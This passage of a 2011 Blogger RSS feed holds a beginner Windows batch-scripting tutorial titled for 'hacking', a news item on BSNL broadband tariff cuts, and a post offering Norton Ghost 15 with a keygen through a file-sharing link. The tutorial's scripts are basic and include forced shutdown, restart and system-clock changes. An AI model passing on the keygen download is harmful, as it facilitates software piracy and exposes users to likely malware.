&lt;a href="http://feedads.g.doubleclick.net/~a/fR-tXmhnH5L1uR8DYjuZRQTOsvc/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/fR-tXmhnH5L1uR8DYjuZRQTOsvc/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/ashisharena/adCx/~4/kCZiHQIkt5Y" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ashisharena/adCx/~3/kCZiHQIkt5Y/bypass-trial-version-limitations-in-any.html</link><author>noreply@blogger.com (ArtistAshish)</author><thr:total>0</thr:total><feedburner:origLink>http://www.ashisharena.com/2011/02/bypass-trial-version-limitations-in-any.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6804681555637047946.post-213633098813498732</guid><pubDate>Tue, 22 Feb 2011 15:39:00 +0000</pubDate><atom:updated>2011-02-22T07:39:51.128-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Batch</category><category domain="http://www.blogger.com/atom/ns#">attack</category><category domain="http://www.blogger.com/atom/ns#">Tutorials</category><category domain="http://www.blogger.com/atom/ns#">windows</category><category domain="http://www.blogger.com/atom/ns#">prompt</category><category domain="http://www.blogger.com/atom/ns#">running</category><category domain="http://www.blogger.com/atom/ns#">password. username</category><category domain="http://www.blogger.com/atom/ns#">amazing</category><category domain="http://www.blogger.com/atom/ns#">break</category><category domain="http://www.blogger.com/atom/ns#">command</category><category domain="http://www.blogger.com/atom/ns#">hack</category><category domain="http://www.blogger.com/atom/ns#">hacking</category><category domain="http://www.blogger.com/atom/ns#">coding</category><title>Batch Tutorial for Hacking</title><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;b&gt;&lt;br /&gt;Here We Go&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;We Will Do It Step By Step&lt;br /&gt;&lt;br /&gt;To Start Off There Is The @echo off/on&lt;br /&gt;And There Is echo &lt;br /&gt;And pause&lt;br /&gt;&lt;br /&gt;So Here Is An Example &lt;span style="color: red;"&gt;&lt;br /&gt;&lt;br /&gt;@echo off&lt;br /&gt;echo Hello This is a test&lt;br /&gt;pause&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Type This In Notepad And Save As Test.bat&lt;br /&gt;Launch It&lt;br /&gt;It Will Look Like This&lt;span style="color: #008400;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Hello This is a test&lt;br /&gt;Press any key to continue...&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Again Open Notepad And Write:&lt;span style="color: red;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;@echo on&lt;br /&gt;echo Hello This is a test&lt;br /&gt;pause&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;And Save It On The Desktop As Test2.bat&lt;br /&gt;Launch It , It Will Look Like This &lt;span style="color: #008400;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;C:\Documents and Settings\User\Desktop&amp;gt;echo Hello This is a test&lt;br /&gt;Hello This is a test&lt;br /&gt;C:\Documents and Settings\User\Desktop&amp;gt;pause&lt;br /&gt;Press any key to continue&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://i.ytimg.com/vi/17Fi-8ilI3o/0.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://i.ytimg.com/vi/17Fi-8ilI3o/0.jpg" width="320" /&gt;&lt;/a&gt;&lt;b&gt;So For The Explanation&lt;br /&gt;&lt;br /&gt;@echo off/on:&lt;br /&gt;If You Put &lt;span style="color: red;"&gt;@echo on&lt;/span&gt; It Will Show The Directory As You Just Saw&lt;br /&gt;If You Put &lt;span style="color: red;"&gt;@echo off&lt;/span&gt; It Will Just Show The Words With No Directories&lt;br /&gt;so its best to use &lt;span style="color: red;"&gt;@echo off&lt;/span&gt;&lt;span style="color: red;"&gt;echo:&lt;/span&gt;&lt;br /&gt;If You Want To Type A Simple Phrase Just Type In echo And Something In This Case echo Hello This is a test&lt;br /&gt;which will show Hello This is a test&lt;br /&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;pause&lt;/span&gt;&lt;br /&gt;Pause  Will Pause The Batch File,If You Press A Key The Batch Will Continue In  This Case It Will Exit Because There Is No More Left&lt;br /&gt;So Try This&lt;span style="color: red;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;@echo off&lt;br /&gt;echo Hello This is a test&lt;br /&gt;pause&lt;br /&gt;echo I am testing pause&lt;br /&gt;pause&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;This Will Show&lt;span style="color: #008400;"&gt;&lt;br /&gt;&lt;br /&gt;Hello This is a test&lt;br /&gt;Press Any Key To Continue...&lt;br /&gt;(when you press a key it will show)&lt;br /&gt;I am testing a pause&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: #008400;"&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: #008400;"&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;So That Convers The Pause Command&lt;br /&gt;&lt;br /&gt;Now Some More Commands&lt;br /&gt;There Is Msg *&lt;br /&gt;And There Is &lt;span style="color: red;"&gt;cls&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Open Notepad And Write:&lt;span style="color: red;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;@echo off&lt;br /&gt;echo Hello This is a test&lt;br /&gt;pause&lt;br /&gt;cls&lt;br /&gt;echo I am testing pause&lt;br /&gt;msg * The End&lt;br /&gt;pause&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;And Save As Test3.bat&lt;br /&gt;&lt;br /&gt;This Will Show&lt;span style="color: #008400;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Hello This is a test&lt;br /&gt;Press Any Key To Continue...&lt;br /&gt;(when you press a key it will show)&lt;br /&gt;cls&lt;br /&gt;(the page will clear)&lt;br /&gt;I am testing a pause&lt;br /&gt;(a pop-up will show saying The End)&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: #008400;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;So .. &lt;span style="color: red;"&gt;cls&lt;/span&gt; Will Just Clear The Screen&lt;br /&gt;And Msg * Will Bring Up A pop-up:D&lt;br /&gt;&lt;br /&gt;Other Commands Are &lt;span style="color: red;"&gt;REM&lt;/span&gt; And &lt;span style="color: red;"&gt;goto&lt;/span&gt; And &lt;span style="color: red;"&gt;start&lt;/span&gt;&lt;br /&gt;So Create A Folder Name It &lt;span style="color: red;"&gt;Test&lt;span style="color: red;"&gt;&lt;br /&gt;Put Any Picture Inside And Name It &lt;span style="color: red;"&gt;testpic&lt;/span&gt;&lt;br /&gt;Open Notepad And Type&lt;span style="color: red;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;@echo off&lt;br /&gt;echo Testing start and rem&lt;br /&gt;rem title Test&lt;br /&gt;start testpic.jpg (or any other extension)&lt;br /&gt;pause&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;And Save It Inside The New Folder As Test4.bat&lt;br /&gt;&lt;br /&gt;Launch It , It Will Show:&lt;span style="color: #008400;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Testing start and rem&lt;br /&gt;Press Any Key To Continue&lt;br /&gt;(and the picture will launch)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;So &lt;span style="color: red;"&gt;start&lt;/span&gt; Will Launch Any File&lt;br /&gt;And &lt;span style="color: red;"&gt;rem&lt;/span&gt; Is A Ramark.. Which Wont Show In The Bat File When Running&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Now The &lt;span style="color: red;"&gt;goto&lt;/span&gt; And &lt;span style="color: red;"&gt;set&lt;/span&gt; And &lt;span style="color: red;"&gt;if&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Type This Inside Notepad&lt;span style="color: red;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;@echo off&lt;br /&gt;echo This is a test&lt;br /&gt;echo If you want to do math type 1 and press enter&lt;br /&gt;echo If you want to see a picture type 2 and press enter&lt;br /&gt;set /p option=&lt;br /&gt;if '%option%'=='1' goto :math&lt;br /&gt;if '%option%'=='2' start testpic.jpg (or any extension)&lt;br /&gt;&lt;br /&gt;:math&lt;br /&gt;echo 2+2&lt;br /&gt;pause&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;And Save It Inside The New Folder&lt;br /&gt;&lt;br /&gt;This Will Show&lt;span style="color: #008400;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;This is a test&lt;br /&gt;If you want to do math type 1 and press enter&lt;br /&gt;if you want to see a picture type 2 and press enter&lt;br /&gt;(here you can type 1 or 2 and press enter)&lt;br /&gt;(if you press 2 and Enter the picture will load)&lt;br /&gt;(if you press 1 and enter this will show up):&lt;br /&gt;2+2&lt;br /&gt;Press any key to continue...&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;So &lt;span style="color: red;"&gt;goto&lt;/span&gt; Will Go To A Label Or A Part Of The File &lt;br /&gt;When You Put &lt;span style="color: red;"&gt;:Math&lt;/span&gt;&lt;br /&gt;A New Label Will Be Named &lt;span style="color: red;"&gt;Math&lt;/span&gt; And When You Put &lt;span style="color: red;"&gt;goto :math&lt;/span&gt;&lt;br /&gt;The Vatch Will Go To &lt;span style="color: red;"&gt;:math&lt;/span&gt;&lt;span style="color: red;"&gt;set&lt;/span&gt; &lt;br /&gt;The Set Option Will Set Something . Here Its Going To Set &lt;span style="color: red;"&gt;:choice&lt;/span&gt;&lt;br /&gt;The Set Is , In Some Options Followed By &lt;span style="color: red;"&gt;if&lt;/span&gt;&lt;br /&gt;So If I Type 1 In This Example &lt;br /&gt;The "choice" Will Be 1 .. And It Will Go To &lt;span style="color: red;"&gt;:math&lt;/span&gt; Because We Put &lt;br /&gt;&lt;span style="color: red;"&gt;if '%choice%'=='1' goto :math&lt;/span&gt;&lt;br /&gt;So If We Put 1 The Choice Will Be 1 Therefore It Will [reed]goto :math&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Now I Am Going To Talk About Call,Exit,And SHIFT?&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Go Into Notepad And Type This&lt;span style="color: red;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;@echo off&lt;br /&gt;echo yay me i know the basics of batch&lt;br /&gt;call call.bat&lt;br /&gt;pause&lt;br /&gt;exit&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;And Save In A New Folder&lt;br /&gt;&lt;br /&gt;Then Open Notepad And Type This Again&lt;span style="color: red;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;@echo off&lt;br /&gt;echo I Love You&lt;br /&gt;pause&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;And Save In The Same Folder That You Saved The Last One And Name It Call.bat&lt;br /&gt;&lt;br /&gt;Launch The First One&lt;br /&gt;This Will Show&lt;span style="color: #008400;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;yay me i know the basics of batch&lt;br /&gt;I Love You&lt;br /&gt;Press Any Key To Continue....&lt;br /&gt;(when you press a key the below will appear)&lt;br /&gt;Press Any Key To Continue...&lt;br /&gt;and when you press a key it will exit&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Ok So Now You Know What &lt;span style="color: red;"&gt;exit&lt;/span&gt; Does It Exits The File And Call ,Calls In Another Batch File!!.. &lt;br /&gt;So Now For &lt;span style="color: red;"&gt;SHIFT&lt;/span&gt; Which Is A Little Hard So Try To Understand&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&lt;br /&gt;SHIFT [/n]&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;If Command Extensions are enabled the &lt;span style="color: red;"&gt;SHIFT&lt;/span&gt; command supports the &lt;span style="color: red;"&gt;/n&lt;/span&gt; switch which tells the command to start shifting at the nth argument, where n can be between zero and eight. &lt;br /&gt;just like this 1 below&lt;span style="color: red;"&gt;&lt;br /&gt;&lt;br /&gt;SHIFT /2&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;would shift %3 to %2, %4 to %3, etc. and leave %0 and %1 . how can i say it&lt;br /&gt;&lt;br /&gt;Examples&lt;br /&gt;&lt;br /&gt;the below has got to be saved as .bat.. so just name it test&lt;span style="color: red;"&gt;&lt;br /&gt;&lt;br /&gt;@ECHO OFF&lt;br /&gt;ECHO - %1&lt;br /&gt;SHIFT&lt;br /&gt;ECHO - %1&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;After  creating the above example test.bat file, if you were to type the below  command at the MS-DOS prompt, it would print "- ONE" and then "- TWO";  this command is commonly used to work through each of the command  extensions or remove command extensions.&lt;br /&gt;(SHIFT , i mean the explanation... i got it from a website and edited it)&lt;br /&gt;&lt;br /&gt;Ok I hope you understand&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Now we will learn how to launch windows applications:&lt;br /&gt;type in notepad:&lt;span style="color: red;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;@echo off&lt;br /&gt;echo I am testing notepad!&lt;br /&gt;start /MIN notepad&lt;br /&gt;pause&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;This will show&lt;span style="color: #008400;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;i am testing notepad&lt;br /&gt;(and notepad will start minimized.. if you put /MAX instead of /MIN it will launch maximized)&lt;br /&gt;Press Any Key To Continue&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Now lets learn how to put a timeout inside a batch..&lt;br /&gt;&lt;br /&gt;goto notepad and type:&lt;span style="color: red;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;@echo off&lt;br /&gt;echo i am trying timeout&lt;br /&gt;set wait=0&lt;br /&gt;:pause1&lt;br /&gt;set /a wait=%wait%+1&lt;br /&gt;if %wait% leq 1000 goto pause1&lt;br /&gt;echo IT WORKED!\&lt;br /&gt;pause&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;dont  understand the command.. just copy paste it.. or memorize it .. if i  tell you the explanation it will take alot of time!!.. &lt;br /&gt;&lt;br /&gt;so this will show :&lt;span style="color: #008400;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;i am trying timeout&lt;br /&gt;(couple of seconds and.. ) &lt;br /&gt;Press Any Key To Continue...&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Now ill teach you how to change the TIME&lt;br /&gt;&lt;br /&gt;goto notepad and type:&lt;span style="color: red;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;@echo off&lt;br /&gt;echo i wonder what time it is!!&lt;br /&gt;TIME 5:50&lt;br /&gt;echo Oh so its 5:50&lt;br /&gt;pause&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;this will show:&lt;span style="color: #008400;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;i wonder what time its is!!&lt;br /&gt;Oh so its 5:50&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span style="color: #008400;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;b&gt;&lt;span style="color: #008400;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&lt;span style="color: red;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span style="color: #008400;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;The TIME will just change The TIME:&lt;br /&gt;&lt;br /&gt;Now the Color&lt;br /&gt;&lt;br /&gt;go into notepad and type this&lt;span style="color: red;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;@echo off&lt;br /&gt;echo trying the colors&lt;br /&gt;pause&lt;br /&gt;color 04&lt;br /&gt;echo testing&lt;br /&gt;pause&lt;br /&gt;color f&lt;br /&gt;echo trying&lt;br /&gt;pause&lt;br /&gt;color 4f&lt;br /&gt;echo trying&lt;br /&gt;pause&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;04=background black and font red&lt;br /&gt;f the font will be white&lt;br /&gt;4f = background red and f = white&lt;br /&gt;&lt;br /&gt;Here are the list(that can be found by cmd&amp;gt;color help)&lt;span style="color: blue;"&gt;&lt;br /&gt;0=black&lt;br /&gt;1=blue&lt;br /&gt;2=green&lt;br /&gt;3=aqua&lt;br /&gt;4=red&lt;br /&gt;5=pu&lt;wbr&gt;&lt;/wbr&gt;rple&lt;br /&gt;6=yellow&lt;br /&gt;7=white&lt;br /&gt;8=gray&lt;br /&gt;9=light blue&lt;br /&gt;a=light green&lt;br /&gt;b=light aqua&lt;br /&gt;c=light red&lt;br /&gt;d=light purple&lt;br /&gt;e=light yellow&lt;br /&gt;f=bright white&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;So this will show it&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;now the title&lt;br /&gt;&lt;br /&gt;type this in notepad&lt;span style="color: red;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;@echo off&lt;br /&gt;tile Test&lt;br /&gt;echo trying the title&lt;br /&gt;pause&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;this will show the title Test When you launch it!! &lt;br /&gt;&lt;br /&gt;lets try Shutdown/Restart&lt;br /&gt;&lt;br /&gt;type this in Notepad&lt;span style="color: red;"&gt;&lt;br /&gt;&lt;br /&gt;@echo off&lt;br /&gt;START C:\Windows\RUNDLL.EXE user.exe,exitwindowsexec&lt;br /&gt;exit&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;The above will restart&lt;span style="color: red;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;@echo off&lt;br /&gt;Shut down the computer&lt;br /&gt;&lt;br /&gt;C:\Windows\RUNDLL32.EXE user,exitwindows&lt;br /&gt;exit&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;The Above will Shutdown&lt;br /&gt;&lt;br /&gt;Well Thats It For Now Enjoy These&lt;/b&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;b&gt;&lt;span style="color: #008400;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span style="color: #008400;"&gt; &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6804681555637047946-213633098813498732?l=www.ashisharena.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/tjoQmQcsBbk7VJa97A_8JUFXRpo/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/tjoQmQcsBbk7VJa97A_8JUFXRpo/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/tjoQmQcsBbk7VJa97A_8JUFXRpo/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/tjoQmQcsBbk7VJa97A_8JUFXRpo/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/ashisharena/adCx/~4/n1ojWDbJXDs" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ashisharena/adCx/~3/n1ojWDbJXDs/batch-tutorial-for-hacking.html</link><author>noreply@blogger.com (ArtistAshish)</author><thr:total>0</thr:total><feedburner:origLink>http://www.ashisharena.com/2011/02/batch-tutorial-for-hacking.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6804681555637047946.post-3667262748864125588</guid><pubDate>Tue, 22 Feb 2011 10:02:00 +0000</pubDate><atom:updated>2011-02-22T02:02:25.687-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">service</category><category domain="http://www.blogger.com/atom/ns#">speed</category><category domain="http://www.blogger.com/atom/ns#">modem</category><category domain="http://www.blogger.com/atom/ns#">telephone</category><category domain="http://www.blogger.com/atom/ns#">reduced</category><category domain="http://www.blogger.com/atom/ns#">broadband</category><category domain="http://www.blogger.com/atom/ns#">netspend</category><category domain="http://www.blogger.com/atom/ns#">internet</category><category domain="http://www.blogger.com/atom/ns#">mtnl</category><category domain="http://www.blogger.com/atom/ns#">3g</category><category domain="http://www.blogger.com/atom/ns#">New</category><category domain="http://www.blogger.com/atom/ns#">improved</category><category domain="http://www.blogger.com/atom/ns#">plan</category><category domain="http://www.blogger.com/atom/ns#">USA</category><category domain="http://www.blogger.com/atom/ns#">India</category><category domain="http://www.blogger.com/atom/ns#">telecom</category><category domain="http://www.blogger.com/atom/ns#">bsnl</category><category domain="http://www.blogger.com/atom/ns#">tarrif</category><title>BSNL reduces postpaid broadband tariff by up to 75%</title><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;Initiating a price war in the broadband segment, state-run BSNL on  Monday announced a reduction in post-paid broadband tariffs by up to 75  per cent, a move that may force private players to follow suite.&lt;br /&gt;&lt;br /&gt;BSNL  offers tariff in two categories — home users and general users. Under  both categories, tariffs are available in limited and unlimited  downloads.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a href="http://t2.gstatic.com/images?q=tbn:ANd9GcT6BGCdID1ib2CCYfdhVaJMo1KSQIPGT4ft61M6YhSxpPX2TQARog" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://t2.gstatic.com/images?q=tbn:ANd9GcT6BGCdID1ib2CCYfdhVaJMo1KSQIPGT4ft61M6YhSxpPX2TQARog" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;To give a push to its broadband business, BSNL has  reformulated its existing post-paid broadband tariff structure, it said  in a statement.&lt;br /&gt;With the implementation of new tariffs the entry  threshold would come down from Rs 2,150 to Rs 850 only translating into a  reduction of over 60 per cent.&lt;br /&gt;&lt;br /&gt;It has reduced download charges  from 50-60 paise per megabyte (MB) to 20 paise per MB for up to 5  gigabyte and 10 paise per MB thereafter. This nearly 75 per cent cut in  tariff will be applicable for customers having plans of Rs 250-700.&lt;br /&gt;&lt;br /&gt;Additional  download charges in limited broadband tariff plans has also been  reduced to 10 paise per MB for all customers paying more than Rs 999  fixed monthly charges.&lt;br /&gt;&lt;br /&gt;The company has announced new broadband tariff plan for business and  corporate customers. This new plan launched in the name of ‘BBG COMBO  ULD 850’ will provide unlimited download to business customers at a  download speed of 1 mega byte per second (mbps) up to 8 GB and 256 kilo  byte per second (kbps) thereafter.&lt;br /&gt;&lt;br /&gt;The company has also upgraded  download speed in various post-paid plans by 50 per cent, besides  increasing free download limit under its various tariff plans up from 10  GB to 250 GB.&lt;br /&gt;&lt;br /&gt;The company announced an increase in free calls  limit for its combo plan. Free calls have been doubled from 250 to 500,  300 to 500 and 500 to 1000 under different categories.&lt;br /&gt;&lt;br /&gt;In  addition to this, the company has introduced free calls facility in four  combo packages. The number of free calls range between 500 to 2000.&lt;br /&gt;&lt;br /&gt;BSNL  has 60 per cent market share in broadband segment and expects that  these new changes in tariff plans to change the broadband landscape of  the country. &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6804681555637047946-3667262748864125588?l=www.ashisharena.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/R4c2g8iLFB3MXiOnGSpvU5IEOxI/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/R4c2g8iLFB3MXiOnGSpvU5IEOxI/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/R4c2g8iLFB3MXiOnGSpvU5IEOxI/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/R4c2g8iLFB3MXiOnGSpvU5IEOxI/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/ashisharena/adCx/~4/9FUcyb41JFA" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ashisharena/adCx/~3/9FUcyb41JFA/bsnl-reduces-postpaid-broadbnd-tariff.html</link><author>noreply@blogger.com (ArtistAshish)</author><thr:total>0</thr:total><feedburner:origLink>http://www.ashisharena.com/2011/02/bsnl-reduces-postpaid-broadbnd-tariff.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6804681555637047946.post-7927134879136698355</guid><pubDate>Tue, 22 Feb 2011 09:57:00 +0000</pubDate><atom:updated>2011-02-22T01:59:16.517-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">full</category><category domain="http://www.blogger.com/atom/ns#">crack</category><category domain="http://www.blogger.com/atom/ns#">keygen</category><category domain="http://www.blogger.com/atom/ns#">antivirus</category><category domain="http://www.blogger.com/atom/ns#">link</category><category domain="http://www.blogger.com/atom/ns#">trial</category><category domain="http://www.blogger.com/atom/ns#">New</category><category domain="http://www.blogger.com/atom/ns#">virus</category><category domain="http://www.blogger.com/atom/ns#">ghost</category><category domain="http://www.blogger.com/atom/ns#">download</category><category domain="http://www.blogger.com/atom/ns#">remove</category><category domain="http://www.blogger.com/atom/ns#">norton</category><category domain="http://www.blogger.com/atom/ns#">spyware</category><title>Norton Ghost 15.0.0.35659 ( New Antivirus Software )</title><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="para"&gt;&lt;div style="text-align: center;"&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;a href="http://images.orkut.com/orkut/photos/OgAAALjp8rZBp9R4uOekwEkutmMxlV4kF_Dc5C1aOFc4SGnhoAZHPMRA1oEuZhEwYRUJ-sCS-8yymxbjcRPTbSHGH3cAm1T1UJAP6z2HOfDIDTvaHe0YAe8HRezg.jpg"&gt;&lt;img alt="" src="http://images.orkut.com/orkut/photos/OgAAALjp8rZBp9R4uOekwEkutmMxlV4kF_Dc5C1aOFc4SGnhoAZHPMRA1oEuZhEwYRUJ-sCS-8yymxbjcRPTbSHGH3cAm1T1UJAP6z2HOfDIDTvaHe0YAe8HRezg.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Norton Ghost 15 is a robust backup solution and professional quality for home users and small businesses.&lt;br /&gt;.&lt;br /&gt;With  Norton Ghost 15, lost or damaged files can be recovered and restored in  the event of a system failure, even if the computer's operating system  does not start.&lt;br /&gt;It also allows backup of an entire system or specific files and folders to save recovery points to offsite locations using FTP.&lt;br /&gt;.&lt;br /&gt;Norton  Ghost 15 is also flexible, allowing users to decide when to back up  your system, either on an hourly basis or on an event.&lt;br /&gt;.&lt;br /&gt;Style: Backup, Cloning HD's&lt;br /&gt;Manufacturer: Symantec&lt;br /&gt;Size: 119.6 Mb&lt;br /&gt;Format: Rar&lt;br /&gt;Language: English&lt;br /&gt;.&lt;br /&gt;Link To Download Full with KeyGen Below:&lt;br /&gt;.&lt;br /&gt;Norton Ghost 15&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.blogger.com/goog_1027561479"&gt;&lt;br /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.4shared.com/file/Y9uFBFAV/Norton_Ghost_15.html%20"&gt;http://www.4shared.com/file/Y9uFBFAV/N&lt;/a&gt;&lt;wbr&gt;&lt;/wbr&gt;&lt;a href="http://www.4shared.com/file/Y9uFBFAV/Norton_Ghost_15.html%20"&gt;orton_Ghost_15.html&lt;/a&gt; &lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6804681555637047946-7927134879136698355?l=www.ashisharena.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/KEXaLLhOgV-GJfZ-lp7rSJgsJh0/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/KEXaLLhOgV-GJfZ-lp7rSJgsJh0/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
